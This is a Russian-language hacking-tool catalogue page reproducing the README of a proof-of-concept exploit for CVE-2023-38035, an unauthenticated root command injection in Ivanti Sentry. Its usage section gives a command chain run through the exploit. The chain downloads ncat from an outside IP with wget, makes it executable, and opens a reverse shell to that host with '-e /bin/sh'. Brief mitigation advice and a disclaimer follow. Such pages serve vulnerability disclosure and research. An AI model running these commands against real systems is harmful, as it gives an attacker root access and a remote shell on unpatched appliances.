Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-38035 — Ivanti Sentry CVE-2023-38035 | Kitploit
Инструменты/GitHubGitHub/horizon3ai/cve-2023-38035
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubhorizon3ai/cve-2023-38035

CVE-2023-38035

Ivanti Sentry CVE-2023-38035

Репозиторий
41122 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-38035

POC для CVE-2023-38035, затрагивающего Ivanti Sentry

Технический анализ

Технический анализ первопричины уязвимости можно найти в нашем блоге: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive

Краткое описание

Этот POC использует неаутентифицированную инъекцию команд для выполнения произвольных команд от имени пользователя root.

Контекст выполнения не позволяет использовать конвейер команд, и в системе нет легко используемых бинарных файлов, поэтому команды можно объединять для загрузки статического ncat откуда-то, например, из https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat.

Использование

root@kitploit:~
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat' 
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Shell

Меры по смягчению

Обновитесь до последней версии в соответствии с инструкциями в уведомлении Ivanti Advisory

  • https://forums.ivanti.com/s/article/KB-API-Authentication-Bypass-on-Sentry-Administrator-Interface-CVE-2023-38035?language=en_US

Следите за командой Horizon3.ai Attack Team в Twitter, чтобы быть в курсе последних исследований в области безопасности:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Отказ от ответственности

Это программное обеспечение было создано исключительно для целей академических исследований и разработки эффективных методов защиты и не предназначено для использования для атаки на системы, за исключением случаев, когда это явно разрешено. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.

Скачать инструмент